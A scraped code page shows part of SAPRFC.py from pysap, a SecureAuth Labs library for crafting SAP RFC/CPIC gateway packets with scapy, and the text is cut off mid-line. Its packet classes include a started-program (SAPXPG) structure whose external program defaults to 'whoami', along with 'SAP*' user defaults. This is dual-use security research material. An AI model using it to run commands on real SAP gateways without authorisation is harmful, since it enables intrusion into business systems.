Best Python code snippet using sure_python
SAPRFC.py
Source:SAPRFC.py
1# ===========2# pysap - Python library for crafting SAP's network protocols packets3#4# SECUREAUTH LABS. Copyright (C) 2019 SecureAuth Corporation. All rights reserved.5#6# The library was designed and developed by Martin Gallo from7# the SecureAuth Labs team.8#9# This program is free software; you can redistribute it and/or10# modify it under the terms of the GNU General Public License11# as published by the Free Software Foundation; either version 212# of the License, or (at your option) any later version.13#14# This program is distributed in the hope that it will be useful,15# but WITHOUT ANY WARRANTY; without even the implied warranty of16# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the17# GNU General Public License for more details.18# ==============19# External imports20from scapy.layers.inet import TCP21from scapy.packet import Packet, bind_layers22from scapy.fields import (ByteField, ConditionalField, IPField, IntField,23 StrFixedLenField, SignedShortField, ShortField,24 ByteEnumKeysField, IntEnumKeysField, SignedIntField,25 FieldLenField, StrLenField, FlagsField, PacketField, StrField, PacketLenField, PacketListField)26# External imports27from scapy.layers.inet6 import IP6Field28from scapy.all import raw29# Custom imports30from pysap.SAPNI import SAPNI31from pysap.utils.fields import StrFixedLenPaddedField, IntToStrField, PacketNoPadded32# RFC Request Type values33rfc_req_type_values = {34 0x00: "GW_UNDEF_TYPE",35 0x01: "CHECK_GATEWAY",36 0x02: "GW_CONNECT_GWWP",37 0x03: "GW_NORMAL_CLIENT",38 0x04: "GW_REMOTE_GATEWAY",39 0x05: "STOP_GATEWAY",40 0x06: "GW_LOCAL_R3",41 0x07: "GW_SEND_INTERNAL_ERROR", # Requires NiLocalCheck42 0x08: "GW_SEND_INFO",43 0x09: "GW_SEND_CMD",44 0x0a: "GW_WORKPROCESS_DIED", # Requires NiLocalCheck45 0x0b: "GW_REGISTER_TP",46 0x0c: "GW_UNREGISTER_TP",47 0x0d: "GW_CONNECT_DISP", # Requires NiLocalCheck48 0x0e: "GW_GET_NO_REGISTER_TP",49 0x0f: "GW_SAP_WP_CLIENT", # Requires NiLocalCheck50 0x10: "GW_CANCEL_REGISTER_TP",51 0x11: "GW_FROM_REMOTE_GATEWAY",52 0x12: "GW_CONTAINER_RECEIVED",53}54rfc_func_type_values = {55 0: "F_NO_REQUEST",56 1: "F_INITIALIZE_CONVERSATION",57 3: "F_ACCEPT_CONVERSATION",58 5: "F_ALLOCATE",59 7: "F_SEND_DATA",60 8: "F_ASEND_DATA",61 9: "F_RECEIVE",62 10: "F_ARECEIVE",63 11: "F_DEALLOCATE",64 13: "F_SET_TP_NAME",65 15: "F_SET_PARTNER_LU_NAME",66 17: "F_SET_SECURITY_PASSWORD",67 19: "F_SET_SECURITY_USER_ID",68 21: "F_SET_SECURITY_TYPE",69 23: "F_SET_CONVERSATION_TYPE",70 25: "F_EXTRACT_TP_NAME",71 27: "F_FLUSH",72 0xc9: "F_SAP_ALLOCATE",73 0xca: "F_SAP_INIT",74 0xcb: "F_SAP_SEND",75 0xcc: "F_ASAP_SEND",76 0xcd: "F_SAP_SYNC",77 0xce: "F_SAP_PING",78 0xcf: "F_SAP_REGTP",79 0xd0: "F_SAP_UNREGTP",80 0xd1: "F_SAP_ACCPTP",81 0xd2: "F_SAP_UNACCPTP",82 0xd3: "F_SAP_CANCTP",83 0xd4: "F_SAP_SET_UID",84 0xd5: "F_SAP_CANCEL",85 0xd6: "F_SAP_CANCELED",86 0xd7: "F_SAP_STOP_STREAMING",87 0xd8: "F_SAP_CONT_STREAMING",88}89"""RFC Request Type values"""90# RFC Monitor Command values91rfc_monitor_cmd_values = {92 0x01: "NOOP",93 0x02: "DELETE_CONN",94 0x03: "CANCEL_CONN",95 0x04: "RST_SINGLE_ERR_CNT",96 0x05: "RST_ALL_ERR_CNT",97 0x06: "INCREASE_TRACE",98 0x07: "DECREASE_TRACE",99 0x08: "READ_SEC_INFO",100 0x09: "REFRESH_SEC_INFO",101 0x0a: "READ_GWSYS_TBL",102 0x0b: "READ_CONN_TBL",103 0x0c: "READ_PROC_TBL",104 0x0d: "READ_CONN_ATTR",105 0x0e: "READ_MEMORY",106 0x0f: "READ_REQ_BLK",107 0x10: "ACT_STATISTIC",108 0x11: "DEACT_STATISTIC",109 0x12: "READ_STATISTIC",110 0x13: "RESET_STATISTIC",111 0x14: "READ_PARAMETER",112 0x19: "DUMP_NIBUFFER",113 0x20: "RESET_NIBUFFER",114 0x21: "ACT_EXTPGM_TRACE",115 0x22: "DEACT_EXTPGM_TRACE",116 0x23: "ACT_CONN_TRACE",117 0x24: "DEACT_CONN_TRACE",118 0x25: "RESET_TRACE",119 0x26: "SUICIDE",120 0x27: "READ_SEC_INFO2",121 0x28: "CANCEL_REG_TP",122 0x29: "DUMP",123 0x2a: "READ_GWSYS_TBL2",124 0x2b: "CHANGE_PARAMETER",125 0x2c: "GET_CONN_PARTNER",126 0x2d: "DELETE_CLIENT",127 0x2e: "DELETE_REMGW",128 0x2f: "DISCONNECT",129 0x30: "ENABLE_RESTART",130 0x31: "DISABLE_RESTART",131 0x32: "NI_TRACE",132 0x33: "CLI_INFO",133 0x34: "GW_INFO",134 0x35: "CONVID_INFO",135 0x36: "GET_NO_REG_TP",136 0x37: "CV_INFO",137 0x38: "SO_KEEPALIVE",138 0x39: "READ_CONN_TBL2",139 0x40: "READ_GWSYS_TBL3",140 0x41: "RELOAD_ACL",141}142"""RFC Monitor Command values"""143appc_protocol_values = {144 0x3: "CPIC",145}146appc_rc_values = {147 0x0: "CM_OK",148 0x1: "CM_ALLOCATE_FAILURE_NO_RETRY",149 0x2: "CM_ALLOCATE_FAILURE_RETRY",150 0x3: "CM_CONVERSATION_TYPE_MISMATCH",151 0x5: "CM_PIP_NOT_SPECIFIED_CORRECTLY",152 0x6: "CM_SECURITY_NOT_VALID",153 0x7: "CM_SYNC_LVL_NOT_SUPPORTED_SYS",154 0x8: "CM_SYNC_LVL_NOT_SUPPORTED_PGM",155 0x9: "CM_TPN_NOT_RECOGNIZED",156 0xa: "CM_TP_NOT_AVAILABLE_NO_RETRY",157 0xb: "CM_TP_NOT_AVAILABLE_RETRY",158 0x11: "CM_DEALLOCATED_ABEND",159 0x12: "CM_DEALLOCATED_NORMAL",160 0x13: "CM_PARAMETER_ERROR",161 0x14: "CM_PRODUCT_SPECIFIC_ERROR",162 0x15: "CM_PROGRAM_ERROR_NO_TRUNC",163 0x16: "CM_PROGRAM_ERROR_PURGING",164 0x17: "CM_PROGRAM_ERROR_TRUNC",165 0x18: "CM_PROGRAM_PARAMETER_CHECK",166 0x19: "CM_PROGRAM_STATE_CHECK",167 0x1a: "CM_RESOURCE_FAILURE_NO_RETRY",168 0x1b: "CM_RESOURCE_FAILURE_RERTY",169 0x1c: "CM_UNSUCCESSFUL",170 0x1e: "CM_DEALLOCATED_ABEND_SVC",171 0x1f: "CM_DEALLOCATED_ABEND_TIMER",172 0x20: "CM_SVC_ERROR_NO_TRUNC",173 0x21: "CM_SVC_ERROR_PURGING",174 0x22: "CM_SVC_ERROR_TRUNC",175 0x23: "CM_OPERATION_INCOMPLETE",176 0x24: "CM_SYSTEM_EVENT",177 0x25: "CM_OPERATION_NOT_ACCEPTED",178 0x26: "CM_CONVERSATION_ENDING",179 0x27: "CM_SEND_RCV_MODE_NOT_SUPPORTED",180 0x28: "CM_BUFFER_TOO_SMALL",181 0x29: "CM_EXP_DATA_NOT_SUPPORTED",182 0x2a: "CM_DEALLOC_CONFIRM_REJECT",183 0x2b: "CM_ALLOCATION_ERROR",184 0x2c: "CM_RETRY_LIMIT_EXCEEDED",185 0x2d: "CM_NO_SECONDARY_INFORMATION",186 0x2e: "CM_SECURITY_NOT_SUPPORTED",187 0x2f: "CM_SECURITY_MUTUAL_FAILED",188 0x30: "CM_CALL_NOT_SUPPORTED",189 0x31: "CM_PARM_VALUE_NOT_SUPPORTED",190 0x64: "CM_TAKE_BACKOUT",191 0x82: "CM_DEALLOCATED_ABEND_BO",192 0x83: "CM_DEALLOCATED_ABEND_SVC_BO",193 0x84: "CM_DEALLOCATED_ABEND_TIMER_BO",194 0x85: "CM_RESOURCE_FAIL_NO_RETRY_BO",195 0x86: "CM_RESOURCE_FAILURE_RETRY_BO",196 0x87: "CM_DEALLOCATED_NORMAL_BO",197 0x88: "CM_CONV_DEALLOC_AFTER_SYNCPT",198 0x89: "CM_INCLUDE_PARTNER_REJECT_BO",199 0x2711: "CM_SAP_TIMEOUT_RETRY",200 0x2712: "CM_CANCEL_REQUEST",201}202cpic_ctypes = {203 0x43: "R_2",204 0x49: "R_3",205 0x45: "STARTED_PRG",206 0x52: "REGISTRED_PRG",207}208rfc_rfc_types = {209 0x32: "R_2_CONN",210 0x33: "ABAP_CONN",211 0x49: "INTERNAL_CONN",212 0x4c: "LOGIC_CONN",213 0x4d: "CMC_CONN",214 0x53: "SNA_CPIC_CONN",215 0x54: "TCP_CONN",216 0x58: "ABAP_DRIVER_CONN",217}218sap_rc_values = {219}220rfc_start_type = {221 0x0: 'DEFAULT',222 0x1: 'REMOTE_SHELL',223 0x2: 'REXEC',224 0x3: 'DISABLED',225 0x4: 'SECURE_SHELL',226}227# APPC Header versions length:228# 1: 4Ch229# 2/3: 64h230# 4: 8Ah231# 5: 4Eh232# 6: 50h233cpic_padd = {234 "cpic_start_padd": "\x01\x01\x00\x08",235 "cpic_unk02_padd": "\x01\x01\x01\x01",236 "cpic_unk01_padd": "\x01\x01\x01\x03",237 "cpic_unk00_padd": "\x01\x03\x01\x06",238 "cpic_ip_padd": "\x01\x06\x00\x07",239 "cpic_ip_padd2": "\x00\x07\x00\x18",240 "cpic_host_sid_inbr_padd": "\x00\x18\x00\x08",241 "cpic_rfc_type_padd": "\x00\x08\x00\x11",242 "cpic_kernel1_padd": "\x00\x11\x00\x13",243 "cpic_kernel2_padd": "\x00\x13\x00\x12",244 "cpic_dest_padd": "\x00\x12\x00\x06",245 "cpic_program_padd": "\x00\x06\x01\x30",246 "cpic_username1_padd": "\x01\x30\x01\x11",247 "cpic_cli_nbr1_padd": "\x01\x11\x01\x14",248 "cpic_unk1_padd": "\x01\x14\x01\x15",249 "cpic_username2_padd": "\x01\x15\x00\x09",250 "cpic_cli_nbr2_padd": "\x00\x09\x01\x34",251 "cpic_unk2_padd": "\x01\x34\x05\x01",252 "cpic_some_params_0_padd": "\x05\x01",253 "cpic_some_params_1_padd": "\x01\x36",254 "cpic_convid_label_padd": "\x01\x36\x05\x02",255 "cpic_kernel3_padd": "\x05\x02\x00\x0b",256 "cpic_RFC_f_padd": "\x00\x0b\x01\x02",257 "cpic_unk4_padd": "\x01\x02\x05\x03",258 "cpic_th_struct_padd": "\x05\x03\x01\x31",259 "cpic_some_params2_padd": "\x01\x31\x05\x14",260 "cpic_unk6_padd": "\x05\x14\x04\x20",261 "cpic_unk7_padd": "\x04\x20\x05\x12",262 "cpic_suff_padd": "\x03\x02\x01\x04",263 "cpic_end_padd": "\x01\x04\xff\xff",264}265cpic_suff_padd = {266 "suff_padd1": "\x10\x04\x02",267 "suff_padd2": "\x10\x04\x0b",268 "suff_padd3": "\x10\x04\x04",269 "suff_padd4": "\x10\x04\x0d",270 "suff_padd5": "\x10\x04\x16",271 "suff_padd6": "\x10\x04\x17",272 "suff_padd7": "\x10\x04\x19",273 "suff_padd8": "\x10\x04\x1e",274 "suff_padd9": "\x10\x04\x25",275 "suff_padd10k": "\x10\x04\x09",276 "suff_padd10": "\x10\x04\x1d",277 "suff_padd11": "\x10\x04\x1f",278 "suff_padd12": "\x10\x04\x20",279 "suff_padd13": "\x10\x04\x21",280 "suff_padd14": "\x10\x04\x24",281 "suff_padd15": "\x10\x04\x24",282}283class SAPRFCEXTEND(PacketNoPadded):284 name = "SAP EXTEND INFO"285 fields_desc = [286 StrFixedLenPaddedField("short_dest_name", "", length=8),287 StrFixedLenPaddedField("ncpic_lu", "", length=8),288 StrFixedLenPaddedField("ncpic_tp", "", length=8),289 ByteEnumKeysField("ctype", 0x45, cpic_ctypes),290 ByteField("clientInfo", 0x01),291 StrFixedLenField("ncpic_parameters_padd", "\x00\x00", length=2),292 ShortField("comm_idx", 0x0),293 ShortField("conn_idx", 0x0),294 ]295class SAPRFCDTStruct(PacketNoPadded):296 """SAP RFC DT structure.297 This STRUCT is used to setup started program.298 """299 name = "SAP RFC DT structure"300 fields_desc = [301 ByteField("version", 0x60),302 StrFixedLenField("padd1", "\x00" * 8, length=8),303 StrFixedLenField("root_id", "\x00" * 16, length=16),304 StrFixedLenField("conn_id", "\x00" * 16, length=16),305 IntField("conn_id_suff", 0),306 SignedIntField("timeout", -1),307 SignedIntField("keepalive_timeout", -1),308 ByteField("export_trace", 2),309 ByteEnumKeysField("start_type", 0x00, rfc_start_type),310 ByteField("net_protocol", 0x00),311 IP6Field("local_addrv6", "::1"),312 StrFixedLenPaddedField("long_lu", "", padd="\x00", length=128),313 StrFixedLenField("padd3", "\x00" * 16, length=16),314 StrFixedLenPaddedField("user", "", length=12),315 StrFixedLenField("padd4", "\x20" * 8, length=8),316 StrFixedLenField("padd5", "\x00" * 4, length=4),317 StrFixedLenField("padd6", "\x20" * 12, length=12),318 StrFixedLenField("padd7", "\x00" * 16, length=16),319 IPField("addr_ipv4", "0.0.0.0"),320 StrFixedLenField("padd8", "\x00" * 4, length=4),321 StrFixedLenPaddedField("long_tp", "", padd="\x00", length=64),322 ]323class SAPCPICSUFFIX(PacketNoPadded):324 """SAP CPIC SUFFIX325 """326 name = "SAP CPIC SUFFIX"327 fields_desc = [328 StrFixedLenField("suff_padd1", "\x10\x04\x02", length=3),329 FieldLenField("suff_unk1_len", None, length_of="suff_unk1", fmt="!H"),330 StrLenField("suff_unk1", "", length_from=lambda pkt: pkt.suff_unk1_len),331 StrFixedLenField("suff_padd2", "\x10\x04\x0b", length=3),332 FieldLenField("suff_unk2_len", None, length_of="suff_unk2", fmt="!H"),333 StrLenField("suff_unk2", "", length_from=lambda pkt: pkt.suff_unk2_len),334 StrFixedLenField("suff_padd3", "\x10\x04\x04", length=3),335 FieldLenField("suff_unk3_len", None, length_of="suff_unk3", fmt="!H"),336 StrLenField("suff_unk3", "", length_from=lambda pkt: pkt.suff_unk3_len),337 StrFixedLenField("suff_padd4", "\x10\x04\x0d", length=3),338 FieldLenField("suff_unk4_len", None, length_of="suff_unk4", fmt="!H"),339 StrLenField("suff_unk4", "", length_from=lambda pkt: pkt.suff_unk4_len),340 StrFixedLenField("suff_padd5", "\x10\x04\x16", length=3),341 FieldLenField("suff_unk5_len", None, length_of="suff_unk5", fmt="!H"),342 StrLenField("suff_unk5", "", length_from=lambda pkt: pkt.suff_unk5_len),343 StrFixedLenField("suff_padd6", "\x10\x04\x17", length=3),344 FieldLenField("suff_unk6_len", None, length_of="suff_unk6", fmt="!H"),345 StrLenField("suff_unk6", "", length_from=lambda pkt: pkt.suff_unk6_len),346 StrFixedLenField("suff_padd7", "\x10\x04\x19", length=3),347 FieldLenField("suff_unk7_len", None, length_of="suff_unk7", fmt="!H"),348 StrLenField("suff_unk7", "", length_from=lambda pkt: pkt.suff_unk7_len),349 StrFixedLenField("suff_padd8", "\x10\x04\x1e", length=3),350 FieldLenField("suff_unk8_len", None, length_of="suff_unk8", fmt="!H"),351 StrLenField("suff_unk8", "", length_from=lambda pkt: pkt.suff_unk8_len),352 StrFixedLenField("suff_padd9", "\x10\x04\x25", length=3),353 FieldLenField("suff_unk9_len", None, length_of="suff_unk9", fmt="!H"),354 StrLenField("suff_unk9", "", length_from=lambda pkt: pkt.suff_unk9_len),355 StrFixedLenField("suff_padd10k", "\x10\x04\x09", length=3),356 FieldLenField("suff_kernel_len", None, length_of="suff_kernel", fmt="!H"),357 StrLenField("suff_kernel", "720", length_from=lambda pkt: pkt.suff_kernel_len),358 # next fields exist only in win versions of clients suff_unk9 == "\x00\x01" (??)359 ConditionalField(StrFixedLenField("suff_padd10", "\x10\x04\x1d", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),360 ConditionalField(FieldLenField("suff_unk10_len", None, length_of="suff_unk10", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),361 ConditionalField(StrLenField("suff_unk10", "", length_from=lambda pkt: pkt.suff_unk10_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"),362 ConditionalField(StrFixedLenField("suff_padd11", "\x10\x04\x1f", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),363 ConditionalField(FieldLenField("suff_cli1_len", None, length_of="suff_cli1", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),364 ConditionalField(StrLenField("suff_cli1", "", length_from=lambda pkt: pkt.suff_cli1_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"), # ip or OS name here365 ConditionalField(StrFixedLenField("suff_padd12", "\x10\x04\x20", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),366 ConditionalField(FieldLenField("suff_cli2_len", None, length_of="suff_cli2", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),367 ConditionalField(StrLenField("suff_cli2", "", length_from=lambda pkt: pkt.suff_cli2_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"), # browser name here368 ConditionalField(StrFixedLenField("suff_padd13", "\x10\x04\x21", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),369 ConditionalField(FieldLenField("suff_cli3_len", None, length_of="suff_cli3", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),370 ConditionalField(StrLenField("suff_cli3", "", length_from=lambda pkt: pkt.suff_cli3_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"), # office name here371 StrFixedLenField("suff_padd14", "\x10\x04\x24", length=3),372 FieldLenField("suff_unk14_len", None, length_of="suff_unk14", fmt="!H"),373 StrLenField("suff_unk14", "", length_from=lambda pkt: pkt.suff_unk14_len),374 StrFixedLenField("suff_padd15", "\x10\x04\x24", length=3),375 FieldLenField("suff_unk15_len", None, length_of="suff_unk15", fmt="!H"),376 StrLenField("suff_unk15", "", length_from=lambda pkt: pkt.suff_unk15_len), # ip here377 ]378class SAPCPICPARAM(PacketNoPadded):379 name = "CPIC Prams1" # ??? may be not params :)380 fields_desc = [381 StrFixedLenField("pref","\x01\x00\x0c\x29", length=4),382 StrFixedLenField("param1","", length=4),383 StrFixedLenField("param2","", length=11),384 StrFixedLenField("param_sess_1","", length=2),385 StrFixedLenField("param_sess_2","", length=4),386 IPField("mask",""),387 IPField("ip",""),388 IntField("flag",1),389 ]390class SAPCPICPARAM2(PacketNoPadded):391 name = "CPIC Prams2" # ??? may be not params :)392 fields_desc = [393 StrFixedLenField("param1","", length=8),394 IPField("mask",""),395 IPField("ip",""),396 ]397class SAPRFCTHStruct(PacketNoPadded):398 """SAP RFC TH structure.399 """400 name = "SAP RFC TH structure"401 fields_desc = [402 StrFixedLenField("th_eyec1", "*TH*", length=4),403 ByteField("th_version", 3),404 ShortField("th_len", 230),405 ShortField("th_trace_flag", None),406 StrFixedLenPaddedField("th_sysid", "", length=32),407 ShortField("th_serevice", 1),408 StrFixedLenPaddedField("th_userid", "SAP*", length=32),409 StrFixedLenPaddedField("th_action", "", length=40),410 StrFixedLenPaddedField("th_presysid", "", length=32),411 ShortField("th_acttype", 1),412 StrFixedLenPaddedField("th_id", "", length=35),413 ByteField("th_unused_comm1", 0,),414 PacketListField("th_some_cpic_params", None, SAPCPICPARAM, count_from=lambda pkt: 1),415 StrFixedLenField("th_unused_comm2", "\x00\x00\x00\xe2", length=4),416 StrFixedLenField("th_eyec2", "*TH*", length=4),417 ]418class SAPRFXPG(PacketNoPadded):419 """SAP Started program packets.420 """421 name = "SAP Started program packets"422 fields_desc = [423 StrFixedLenField("xpg_padd100", "\x05\x12\x02\x05", length=4),424 FieldLenField("xpg_convid_l_len", None, length_of="xpg_convid_l", fmt="!H"),425 StrLenField("xpg_convid_l", "CONVID", length_from=lambda pkt: pkt.xpg_convid_l_len),426 StrFixedLenField("xpg_padd101", "\x02\x05\x02\x05", length=4),427 FieldLenField("xpg_strstat_l_len", None, length_of="xpg_strstat_l", fmt="!H"),428 StrLenField("xpg_strstat_l", "STRTSTAT", length_from=lambda pkt: pkt.xpg_strstat_l_len),429 StrFixedLenField("xpg_padd102", "\x02\x05\x02\x05", length=4),430 FieldLenField("xpg_xpgid_l_len", None, length_of="xpg_xpgid_l", fmt="!H"),431 StrLenField("xpg_xpgid_l", "XPGID", length_from=lambda pkt: pkt.xpg_xpgid_l_len),432 StrFixedLenField("xpg_padd103", "\x02\x05\x02\x01", length=4),433 FieldLenField("xpg_extprog_l_len", None, length_of="xpg_extprog_l", fmt="!H"),434 StrLenField("xpg_extprog_l", "EXTPROG", length_from=lambda pkt: pkt.xpg_extprog_l_len),435 StrFixedLenField("xpg_padd104", "\x02\x01\x02\x03", length=4),436 FieldLenField("xpg_extprog_val_len", None, length_of="xpg_extprog_val", fmt="!H"),437 StrLenField("xpg_extprog_val", "whoami", length_from=lambda pkt: pkt.xpg_extprog_val_len),438 StrFixedLenField("xpg_padd105", "\x02\x03\x02\x01", length=4),439 FieldLenField("xpg_longparam_l_len", None, length_of="xpg_longparam_l", fmt="!H"),440 StrLenField("xpg_longparam_l", "LONG_PARAMS", length_from=lambda pkt: pkt.xpg_longparam_l_len),441 StrFixedLenField("xpg_padd106", "\x02\x01\x02\x03", length=4),442 FieldLenField("xpg_longparam_val_len", None, length_of="xpg_longparam_val", fmt="!H"),443 StrLenField("xpg_longparam_val", "", length_from=lambda pkt: pkt.xpg_longparam_val_len),444 StrFixedLenField("xpg_padd107", "\x02\x03\x02\x01", length=4),445 FieldLenField("xpg_param_l_len", None, length_of="xpg_param_l", fmt="!H"),446 StrLenField("xpg_param_l", "PARAMS", length_from=lambda pkt: pkt.xpg_param_l_len),447 StrFixedLenField("xpg_padd108", "\x02\x01\x02\x03", length=4),448 FieldLenField("xpg_param_val_len", None, length_of="xpg_param_val", fmt="!H"),449 StrLenField("xpg_param_val", "", length_from=lambda pkt: pkt.xpg_param_val_len),450 StrFixedLenField("xpg_padd109", "\x02\x03\x02\x01", length=4),451 FieldLenField("xpg_stderrcntl_l_len", None, length_of="xpg_stderrcntl_l", fmt="!H"),452 StrLenField("xpg_stderrcntl_l", "STDERRCNTL", length_from=lambda pkt: pkt.xpg_stderrcntl_l_len),453 StrFixedLenField("xpg_padd110", "\x02\x01\x02\x03", length=4),454 FieldLenField("xpg_stderrcntl_val_len", None, length_of="xpg_stderrcntl_val", fmt="!H"),455 StrLenField("xpg_stderrcntl_val", "", length_from=lambda pkt: pkt.xpg_stderrcntl_val_len),456 StrFixedLenField("xpg_padd111", "\x02\x03\x02\x01", length=4),457 FieldLenField("xpg_stdincntl_l_len", None, length_of="xpg_stdincntl_l", fmt="!H"),458 StrLenField("xpg_stdincntl_l", "STDINCNTL", length_from=lambda pkt: pkt.xpg_stdincntl_l_len),459 StrFixedLenField("xpg_padd112", "\x02\x01\x02\x03", length=4),460 FieldLenField("xpg_stdincntl_val_len", None, length_of="xpg_stdincntl_val", fmt="!H"),461 StrLenField("xpg_stdincntl_val", "PARAMS", length_from=lambda pkt: pkt.xpg_stdincntl_val_len),462 StrFixedLenField("xpg_padd113", "\x02\x03\x02\x01", length=4),463 FieldLenField("xpg_stdoutcntl_l_len", None, length_of="xpg_stdoutcntl_l", fmt="!H"),464 StrLenField("xpg_stdoutcntl_l", "STDOUTCNTL", length_from=lambda pkt: pkt.xpg_stdoutcntl_l_len),465 StrFixedLenField("xpg_padd114", "\x02\x01\x02\x03", length=4),466 FieldLenField("xpg_stdoutcntl_val_len", None, length_of="xpg_stdoutcntl_val", fmt="!H"),467 StrLenField("xpg_stdoutcntl_val", "", length_from=lambda pkt: pkt.xpg_stdoutcntl_val_len),468 StrFixedLenField("xpg_padd115", "\x02\x03\x02\x01", length=4),469 FieldLenField("xpg_termcntl_l_len", None, length_of="xpg_termcntl_l", fmt="!H"),470 StrLenField("xpg_termcntl_l", "TERMCNTL", length_from=lambda pkt: pkt.xpg_termcntl_l_len),471 StrFixedLenField("xpg_padd116", "\x02\x01\x02\x03", length=4),472 FieldLenField("xpg_termcntl_val_len", None, length_of="xpg_termcntl_val", fmt="!H"),473 StrLenField("xpg_termcntl_val", "", length_from=lambda pkt: pkt.xpg_termcntl_val_len),474 StrFixedLenField("xpg_padd117", "\x02\x03\x02\x01", length=4),475 FieldLenField("xpg_tracecntl_l_len", None, length_of="xpg_tracecntl_l", fmt="!H"),476 StrLenField("xpg_tracecntl_l", "TRACECNTL", length_from=lambda pkt: pkt.xpg_tracecntl_l_len),477 StrFixedLenField("xpg_padd118", "\x02\x03\x02\x01", length=4),478 FieldLenField("xpg_tracecntl_val_len", None, length_of="xpg_tracecntl_val", fmt="!H"),479 StrLenField("xpg_tracecntl_val", "", length_from=lambda pkt: pkt.xpg_tracecntl_val_len),480 StrFixedLenField("xpg_padd119", "\x02\x03\x03\x01", length=4),481 FieldLenField("xpg_log_l_len", None, length_of="xpg_log_l", fmt="!H"),482 StrLenField("xpg_log_l", "LOG", length_from=lambda pkt: pkt.xpg_log_l_len),483 StrFixedLenField("xpg_padd120", "\x03\x01\x03\x30", length=4),484 FieldLenField("xpg_log_val1_len", None, length_of="xpg_log_val1", fmt="!H"),485 StrLenField("xpg_log_val1", "", length_from=lambda pkt: pkt.xpg_log_val1_len),486 StrFixedLenField("xpg_padd121", "\x03\x30\x03\x02", length=4),487 FieldLenField("xpg_unk1_len", None, length_of="xpg_unk1", fmt="!H"),488 StrLenField("xpg_unk1", "", length_from=lambda pkt: pkt.xpg_unk1_len),489 ]490class DEF_FIELDS(PacketNoPadded):491 fields_desc = [492 StrFixedLenField("start_padd", "", length=4),493 FieldLenField("start_field1_len", None, length_of="start_field1", fmt="!H"),494 StrLenField("start_field1", "", length_from=lambda pkt: pkt.start_field1_len),495 ]496class SAPRFCPING(PacketNoPadded):497 """SAP Started program packets RFCPING.498 """499 name = "SAP Started RFCPING packets"500 fields_desc = [501 PacketListField("fields_test", None, DEF_FIELDS, count_from=lambda pkt: 7),502 ]503class SAPRFXPG_END(PacketNoPadded):504 """SAP Started program packets SAPRFXPG_END.505 """506 name = "SAP Started SAPRFXPG_END packets"507 fields_desc = [508 StrFixedLenField("xpg_end_padd001", "\x05\x12\x02\x05", length=4),509 FieldLenField("xpg_end_ecode_l_len", None, length_of="xpg_end_ecode_l", fmt="!H"),510 StrLenField("xpg_end_ecode_l", "EXITCODE", length_from=lambda pkt: pkt.xpg_end_ecode_l_len),511 StrFixedLenField("xpg_end_padd002", "\x02\x05\x02\x05", length=4),512 FieldLenField("xpg_end_estat_l_len", None, length_of="xpg_end_estat_l", fmt="!H"),513 StrLenField("xpg_end_estat_l", "STRTSTAT", length_from=lambda pkt: pkt.xpg_end_estat_l_len),514 StrFixedLenField("xpg_end_padd003", "\x02\x05\x03\x01", length=4),515 FieldLenField("xpg_end_log_l_len", None, length_of="xpg_end_log_l", fmt="!H"),516 StrLenField("xpg_end_log_l", "LOG", length_from=lambda pkt: pkt.xpg_end_log_l_len),517 StrFixedLenField("xpg_end_padd004", "\x03\x01\x03\x30", length=4),518 FieldLenField("xpg_end_unk1_len", None, length_of="xpg_end_unk1", fmt="!H"),519 StrLenField("xpg_end_unk1", "\x00\x00\x00\x01", length_from=lambda pkt: pkt.xpg_end_unk1_len),520 StrFixedLenField("xpg_end_padd005", "\x03\x30\x03\x02", length=4),521 FieldLenField("xpg_end_unk2_len", None, length_of="xpg_end_unk2", fmt="!H"),522 StrLenField("xpg_end_unk2", "\x00\x00\x00\x80\x00\x00\x00\x00", length_from=lambda pkt: pkt.xpg_end_unk2_len),523 ]524class SAPCPIC2(PacketNoPadded):525 """SAP CPIC2 Packet526 """527 name = "SAP CPIC Packet"528 fields_desc = [529 StrFixedLenField("cpic_padd015_1", "", length=2),530 ConditionalField(FieldLenField("cpic_some_params_len", None, length_of="some_cpic_params", fmt="!H"), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),531 ConditionalField(PacketListField("some_cpic_params",None, SAPCPICPARAM, length_from=lambda pkt: pkt.cpic_some_params_len), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),532 StrFixedLenField("cpic_padd016", "", length=4),533 ConditionalField(FieldLenField("cpic_convid_label_len", None, length_of="cpic_convid_label", fmt="!H"), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),534 ConditionalField(StrLenField("cpic_convid_label", "", length_from=lambda pkt: pkt.cpic_convid_label_len), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),535 StrFixedLenField("cpic_padd017", "", length=4),536 ConditionalField(FieldLenField("cpic_kernel3_len", None, length_of="cpic_kernel3", fmt="!H"), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),537 ConditionalField(StrLenField("cpic_kernel3", "", length_from=lambda pkt: pkt.cpic_kernel3_len), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),538 StrFixedLenField("cpic_padd018", "", length=4),539 ConditionalField(FieldLenField("cpic_RFC_f_len", None, length_of="cpic_RFC_f", fmt="!H"), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),540 ConditionalField(StrLenField("cpic_RFC_f", "", length_from=lambda pkt: pkt.cpic_RFC_f_len), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),541 StrFixedLenField("cpic_padd019", "", length=4),542 ConditionalField(FieldLenField("cpic_unk4_len", None, length_of="cpic_unk4", fmt="!H"), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),543 ConditionalField(StrLenField("cpic_unk4", "", length_from=lambda pkt: pkt.cpic_unk4_len), lambda pkt: pkt.cpic_padd019 == 